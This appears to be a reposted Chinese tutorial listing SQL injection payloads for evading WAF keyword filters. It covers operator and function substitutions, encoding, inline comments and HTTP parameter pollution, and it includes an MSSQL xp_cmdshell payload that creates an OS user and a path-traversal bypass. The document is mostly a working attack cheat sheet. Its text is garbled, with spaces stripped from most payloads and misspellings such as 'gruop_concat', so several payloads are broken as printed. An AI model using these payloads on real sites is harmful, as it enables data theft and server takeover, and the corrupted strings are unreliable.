SQL注入绕过的知识点有哪些

2025-03-24 技术教程

这篇文章主要介绍SQL注入绕过的知识点有哪些，文中介绍的非常详细，具有一定的参考价值，感兴趣的小伙伴们一定要看完！

一、绕过waf思路

从第一步起，一点一点去分析，然后绕过。

1、过滤 and,or

preg_match('/(and|or)/i',$id)Filteredinjection:1or1=11and1=1Bypassedinjection:1||1=11&&1=1

2、过滤 and, or, union

preg_match('/(and|or|union)/i',$id)Filteredinjection:unionselectuser,passwordfromusersBypassedinjection:1||(selectuserfromuserswhereuser_id=1)='admin'

3、过滤 and, or, union, where

preg_match('/(and|or|union|where)/i',$id)Filteredinjection:1||(selectuserfromuserswhereuser_id=1)='admin'Bypassedinjection:1||(selectuserfromuserslimit1)='admin'

4、过滤 and, or, union, where, limit

preg_match('/(and|or|union|where|limit)/i',$id)Filteredinjection:1||(selectuserfromuserslimit1)='admin'Bypassedinjection:1||(selectuserfromusersgroupbyuser_idhavinguser_id=1)='admin'

5、过滤 and, or, union, where, limit, group by

preg_match('/(and|or|union|where|limit|groupby)/i',$id)Filteredinjection:1||(selectuserfromusersgroupbyuser_idhavinguser_id=1)='admin'Bypassedinjection:1||(selectsubstr(gruop_concat(user_id),1,1)userfromusers)=1

6、过滤 and, or, union, where, limit, group by, select

preg_match('/(and|or|union|where|limit|groupby|select)/i',$id)Filteredinjection:1||(selectsubstr(gruop_concat(user_id),1,1)userfromusers)=1Bypassedinjection:1||1=1intooutfile'result.txt'Bypassedinjection:1||substr(user,1,1)='a'

7、过滤 and, or, union, where, limit, group by, select, ‘

preg_match('/(and|or|union|where|limit|groupby|select|\')/i',$id)Filteredinjection:1||(selectsubstr(gruop_concat(user_id),1,1)userfromusers)=1Bypassedinjection:1||user_idisnotnullBypassedinjection:1||substr(user,1,1)=0x61Bypassedinjection:1||substr(user,1,1)=unhex(61)

8、过滤 and, or, union, where, limit, group by, select, ‘, hex

preg_match('/(and|or|union|where|limit|groupby|select|\'|hex)/i',$id)Filteredinjection:1||substr(user,1,1)=unhex(61)Bypassedinjection:1||substr(user,1,1)=lower(conv(11,10,36))

9、过滤 and, or, union, where, limit, group by, select, ‘, hex, substr

preg_match('/(and|or|union|where|limit|groupby|select|\'|hex|substr)/i',$id)Filteredinjection:1||substr(user,1,1)=lower(conv(11,10,36))Bypassedinjection:1||lpad(user,7,1)

10、过滤 and, or, union, where, limit, group by, select, ‘, hex, substr, 空格

preg_match('/(and|or|union|where|limit|groupby|select|\'|hex|substr|\s)/i',$id)Filteredinjection:1||lpad(user,7,1)ypassedinjection:1%0b||%0blpad(user,7,1)

二、正则绕过

根据正则的的模糊匹配特性绕过，比如过滤了'='

filtered injection: 1 or 1 = 1

Bypassed injection: 1 or 1,1 or ‘1',1 or char(97)

eg:filteredinjection:1unionselect1,table_namefrominformation_schema.tableswheretable_name='users'Bypassedinjection:1unionselect1,table_namefrominformation_schema.tableswheretable_namebetween'a'and'z'Bypassedinjection:1unionselect1,table_namefrominformation_schema.tableswheretable_namebetweenchar(97)andchar(122)Bypassedinjection:1unionselect1,table_namefrominformation_schema.tableswheretable_namebetween0x61and0x7aBypassedInjection:1unionselect1,table_namefrominformation_schema.tableswheretable_namelike0x7573657273

三、通用绕过

1.注释符

?id=1+un//ion+se//lect+1,2,3–

2.大小写

?id=1+UnIoN//SeLecT//1,2,3–

3.关键字替换

有些waf等使用preg_replace替换了SQL关键字

?id=1+UNunionION+SEselectLECT+1,2,3--?id=1+uni%0bon+se%0blect+1,2,3--

有时候注释符'/**/‘可能被过滤，也可以使用%0b绕过

Forbidden:http://localhost/id/1/**/||/**/lpad(first_name,7,1).htmlBypassed:http://localhost/id/1%0b||%0blpad(first_name,7,1).html

4.编码

一个经典的脚本：Nukesentinel.php

//CheckforUNIONattack//Copyright2004(c)RavenPHPScripts$blocker_row=$blocker_array[1];if($blocker_row['activate']>0){if(stristr($nsnst_const['query_string'],'+union+')OR\stristr($nsnst_const['query_string'],'%20union%20')OR\stristr($nsnst_const['query_string'],'*/union/*')OR\stristr($nsnst_const['query_string'],'union')OR\stristr($nsnst_const['query_string_base64'],'+union+')OR\stristr($nsnst_const['query_string_base64'],'%20union%20')OR\stristr($nsnst_const['query_string_base64'],'*/union/*')OR\stristr($nsnst_const['query_string_base64'],'union')){//block_ip($blocker_row);die("BLOCKIP1");}}

Forbidden:http://localhost/php/?/**/union/**/selectBypassed:http://localhost/php/?/%2A%2A/union/%2A%2A/selectBypassed:http://localhost/php/?%2f**%2funion%2f**%2fselect

5.缓冲区溢出

http://localhost/news.php?id=1+and+(select1)=(select0xA*1000)+union+select+1,2,version(),database(),user(),6,7,8,9,10–

6.内联注释(mysql)

http://localhost/news.php?id=1/*!UnIoN*/SeLecT+1,2,3--http://localhost/news.php?id=/*!UnIoN*/+/*!SeLecT*/+1,2,concat(/*!table_name*/)+FrOm/*!information_schema*/.tables/*!WhErE*/+/*!TaBlE_sChEMa*/+like+database()--

四、高级绕过

1.HPP（http参数污染)

举个例子：

index.php?par1=val1&par1=val2|webserver|par1||:—|:—||ASP.NET/IIS|val1,val2||ASP/IIS|val1,val2||PHP/Apache|val2||JSP/Tomcat|val1|

eg:

在ASP/ASP.NET的环境下

Forbidden:http://localhost/search.aspx?q=selectname,passwordfromusersBypassed:http://localhost/search.aspx?q=selectname&q=passwordfromusersBypassed:http://localhost/search.aspx?q=select/*&q=*/name&q=password/*&q=*/from/*&q=*/usersBypassed:http://localhost/news.aspx?id=1';/*&id=1*/EXEC/*&id=1*/master..xp_cmdshell/*&id=1*/netusertesttest/*&id=1*/--

2.HPC(http参数污染)

RFC2396定义了如下一些字符：

Unreserved:a-z,A-Z,0-9and_.!~*'()Reserved:;/?:@&=+$,Unwise:{}|\^[]`

不同的Web服务器处理处理构造得特殊请求时有不同的逻辑：

|QueryString|Apache/2.2.16,PHP/5.3.3|IIS6/ASP||:—|:—|:—||?test[1=2|test_1=2|test[1=2||?test=%|test=%|test=||?test%00=1|test=|test=1||?test=1%001|NULL|test=1||?test+d=1+2|test_d=12|testd=12|

eg:

Forbidden:http://localhost/?xp_cmdshellBypassed:http://localhost/?xp[cmdshellForbidden:http://localhost/test.asp?file=../flag.txtBypassed:http://localhost/test.asp?file=.%./flag.txtForbidden:http://localhost/news.asp?id=10and1=0/(selecttop1table_namefrominformation_schema.tables)Bypassed:http://localhost/news.asp?id=10a%nd1=0/(se%lecttop1ta%ble_namefr%ominfo%rmation_schema.tables)

以上是“SQL注入绕过的知识点有哪些”这篇文章的所有内容，感谢各位的阅读！希望分享的内容对大家有帮助，更多相关知识，欢迎关注亿速云行业资讯频道！